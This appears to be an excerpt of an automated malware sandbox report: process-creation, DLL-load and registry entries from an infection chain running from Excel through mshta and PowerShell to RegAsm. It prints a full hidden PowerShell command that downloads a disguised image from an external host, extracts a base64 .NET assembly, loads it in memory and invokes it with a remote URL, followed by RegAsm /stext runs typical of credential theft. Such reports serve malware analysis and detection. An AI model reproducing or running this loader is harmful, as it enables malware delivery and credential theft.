? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? 
? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih"
                Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: dwmapi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: webio.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: nlaapi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: oleacc.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: credssp.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: bcrypt.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
                Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
                Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: dwmapi.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
                Source: C:\Windows\System32\wscript.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: shcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: webio.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: nlaapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rpcrtremote.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pstorec.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: atl.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64win.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wow64cpu.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winmm.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: samcli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msacm32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwmapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb\ source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.522013481.000000001C5F0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.514320776.0000000012730000.00000004.00000800.00020000.00000000.sdmp
